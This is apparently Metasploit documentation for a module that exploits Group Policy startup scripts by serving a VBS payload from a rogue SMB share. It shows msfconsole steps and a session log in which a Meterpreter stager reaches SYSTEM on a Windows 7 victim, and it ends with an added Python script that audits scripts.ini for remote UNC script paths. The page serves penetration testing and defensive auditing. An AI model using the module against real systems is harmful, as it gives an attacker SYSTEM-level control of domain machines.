
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/smb/group_policy_startup.md

Vulnerable Application

This is a general-purpose module for exploiting systems whose Windows Group Policy is configured to load VBS startup or logon scripts from a remote location. The module stands up an SMB share that serves the payload as a VBS file. Startup scripts run as SYSTEM, while logon scripts run with the privileges of the user who logs on. The module only serves the file: the attacker still has to get the target's script traffic to the rogue SMB share, either because the Group Policy already points at a host or path the attacker controls, or by redirecting the target's name resolution or network traffic to the attacker's machine.

Please note that in some cases it can take 5 to 10 minutes to receive a session, since the script only runs when a computer starts up or a user logs on.

More information is available at Gotham Digital Science Security.

Verification Steps

  1. Start msfconsole

  2. Do: use modules/exploits/windows/smb/group_policy_startup

  3. Do: exploit

Options

FILE_NAME

VBS file name to share (Default: random name ending in .vbs)

FOLDER_NAME

Folder name to share (Default: none)

SHARE

Share name (Default: Random)

Scenarios

Domain Group Policy

In this scenario, the following computers are present:

  1. Windows 7 (x64, Build 7601, SP1): Victim

  2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller

The module sets up the SMB share and the VBScript file. Out of band (outside the scope of this module and these docs), a Group Policy whose startup script points at \\192.168.1.3\scripts\startup.vbs is applied to the OU containing the victim computer. On its next boot the Windows 7 box fetches and runs the script, which in this case launches the Meterpreter reverse_tcp stager, with SYSTEM privileges because it is executed as a startup script. Any other computer in that OU would execute the same script when it starts up.

```
msf > use modules/exploits/windows/smb/group_policy_startup
msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
FILE_NAME => startup.vbs
msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
SHARE => scripts
msf exploit(windows/smb/group_policy_startup) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] File available on \\192.168.1.3\scripts\startup.vbs...
[*] Started service listener on 192.168.1.3:445
[*] Server started.
[*] Sending stage (180291 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
msf exploit(windows/smb/group_policy_startup) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer        : MSF-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : MSF
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
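The condition this module abuses is visible on the domain side: Group Policy stores startup/shutdown and logon/logoff script assignments in a `scripts.ini` file under `\\<domain>\SYSVOL\<domain>\Policies\{GPO-GUID}\Machine\Scripts\` (and `User\Scripts\`), and an entry whose `CmdLine` is a UNC path to anything other than a domain controller's SYSVOL or NETLOGON share means clients will fetch and run code from that host. The following audit script is an added example written for this page, not part of the Metasploit module or of the Rapid7 documentation. It parses a `scripts.ini` and flags such entries. The sample file content is constructed to mirror the scenario above (entry 0 of `[Startup]` points at the module's `\\192.168.1.3\scripts\startup.vbs`); the domain name `msf.local` and DC name `dc01.msf.local` are assumptions, since the page only shows the NetBIOS domain `MSF`.

```python
"""Audit a Group Policy scripts.ini for startup/logon scripts loaded from a UNC
path outside SYSVOL/NETLOGON (the configuration group_policy_startup relies on).

Added example for this page; not code from the Metasploit module. The sample
below is constructed, and the msf.local / dc01.msf.local names are assumed.
"""
import configparser
import re
from typing import Dict, List, Set

# Constructed sample: GPMC writes scripts.ini as UTF-16 with a BOM, a leading
# blank line, and "<index>CmdLine" / "<index>Parameters" keys per section.
SAMPLE_SCRIPTS_INI = (
    "\r\n"
    "[Startup]\r\n"
    "0CmdLine=\\\\192.168.1.3\\scripts\\startup.vbs\r\n"   # the module's share
    "0Parameters=\r\n"
    "1CmdLine=inventory.vbs\r\n"                           # file inside the GPO folder
    "1Parameters=\r\n"
    "[Shutdown]\r\n"
    "0CmdLine=\\\\msf.local\\SYSVOL\\msf.local\\scripts\\cleanup.vbs\r\n"  # assumed domain
    "0Parameters=/quiet\r\n"
).encode("utf-16")

UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)(?:\\.*)?$")  # \\host\share[\rest]
KEY_RE = re.compile(r"^(\d+)(CmdLine|Parameters)$")


def decode_scripts_ini(raw: bytes) -> str:
    """Honour the UTF-16 BOM GPMC writes; fall back to ASCII/UTF-8 for hand-made files."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_scripts_ini(raw: bytes) -> List[Dict[str, str]]:
    """Return one record per script entry: section, index, cmdline, parameters."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep "0CmdLine" as written instead of lower-casing it
    cp.read_string(decode_scripts_ini(raw))
    records: List[Dict[str, str]] = []
    for section in cp.sections():  # Startup / Shutdown / Logon / Logoff
        by_index: Dict[str, Dict[str, str]] = {}
        for key, value in cp.items(section):
            m = KEY_RE.match(key)
            if not m:
                continue
            idx, field = m.groups()
            entry = by_index.setdefault(idx, {"cmdline": "", "parameters": ""})
            entry["cmdline" if field == "CmdLine" else "parameters"] = value.strip()
        for idx in sorted(by_index, key=int):
            records.append({"section": section, "index": idx, **by_index[idx]})
    return records


def classify(cmdline: str, trusted_hosts: Set[str]) -> str:
    """
    'gpo'    - bare file name, resolved inside the GPO's own Scripts folder in SYSVOL
    'local'  - drive-letter path on the client itself
    'sysvol' - UNC to the SYSVOL or NETLOGON share of a trusted host (DC or domain name)
    'remote' - any other UNC: the client fetches and executes code from that host
    """
    m = UNC_RE.match(cmdline)
    if not m:
        return "local" if re.match(r"^[A-Za-z]:\\", cmdline) else "gpo"
    host, share = m.group(1).lower(), m.group(2).lower()
    if host in trusted_hosts and share in ("sysvol", "netlogon"):
        return "sysvol"
    return "remote"


def audit(raw: bytes, trusted_hosts: Set[str]) -> List[Dict[str, str]]:
    """Flag every entry whose script would be loaded from a non-SYSVOL remote share."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for rec in parse_scripts_ini(raw):
        if classify(rec["cmdline"], trusted) == "remote":
            findings.append({**rec, "reason": "script loaded from UNC path outside SYSVOL/NETLOGON"})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SCRIPTS_INI, {"msf.local", "dc01.msf.local"}):
        print(f"[{f['section']}] #{f['index']}: {f['cmdline']} -> {f['reason']}")
```

Run it against every `Machine\Scripts\scripts.ini` and `User\Scripts\scripts.ini` under the domain's Policies folder, passing the domain DNS name and the domain controllers' names as `trusted_hosts`. A `remote` hit is exactly the configuration this module serves a payload for, and a `CmdLine` that names a host which does not exist in DNS is worse still, since a name-resolution spoofing attacker can become that host.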